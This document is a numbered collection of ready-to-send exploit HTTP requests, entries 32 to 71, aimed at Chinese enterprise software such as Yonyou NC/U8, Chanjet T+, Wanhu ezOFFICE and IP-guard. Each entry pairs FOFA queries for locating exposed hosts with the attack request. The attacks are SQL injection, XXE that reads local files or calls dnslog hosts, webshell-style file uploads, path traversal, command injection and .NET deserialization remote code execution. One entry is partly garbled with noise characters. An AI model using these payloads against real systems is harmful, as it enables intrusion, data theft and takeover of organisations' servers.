GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

2 @* U% |/ }, Q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
2 _% F# \! n5 U2 `+ @( NFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
" z2 q, w  C8 o8 f: E: gPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1$ m, {+ B% M: P( t0 Q. _& W$ [
Host: 192.168.86.128:90904 J* i- Q1 b( a; |. b, B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36' R9 }/ T8 \/ s. \) L8 U) j
Connection: close) z5 U) Q  b- v
Content-Length: 1669
  h, M& \- J  K1 k( @Accept: */*
% g& P/ f$ a  F/ i  D; T5 Z$ F  tAccept-Language: en4 T& f" E8 }  ?# b4 _. l
Content-Type: application/x-www-form-urlencoded
( \. ^2 ~+ G! X1 m) i5 nAccept-Encoding: gzip/ D% d! v) y/ R8 M0 n) y
5 w) T" ^5 H6 C8 q( V( a
PAYLOAD
  n" V/ p# T  ]3 G8 A/ ?- M3 M! f5 b4 G( e
1 x" p1 C1 N: E7 Y$ W, ~1 [
60. Byzoro Smart management platform (百卓Smart管理平台) importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64; the value above decodes to select 1,user(),3, so the endpoint executes a caller-supplied statement and returns the rows as a spreadsheet.

61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter is concatenated into a shell command; "||" runs the echo when the preceding command fails. Then request the written file:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

A response delayed by about five seconds indicates the time-based injection in sId.

65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
An HTTP 200 response means the account test123456/123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Content-Length: 180

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaboration platform (万户ezOFFICE协同管理平台) SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 (the MD5 of 102103122 computed by the injected HashBytes call), the target is vulnerable.

67. Wanhu ezOFFICE (万户ezOFFICE) wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and filename set the name of the written file, dir sets the directory it is written to, and fileType sets the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu ezOFFICE (万户ezOFFICE) wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ";.js" suffix is a path parameter: a filter that matches on the raw request path sees a static .js resource and lets the request through, while the servlet container still resolves it to wf_printnum.jsp. A five-second delay confirms the injection.

69. Wanhu ezOFFICE (万户ezOFFICE) contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP (万户ezEIP) success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header carries the base64-encoded command (the value above decodes to type C:\Windows\win.ini) and __VIEWSTATE carries the deserialization payload that executes it (elided).

71. Bangyong PM2 project management system (邦永PM2项目管理系统) Global_UserLogin.aspx SQL injection
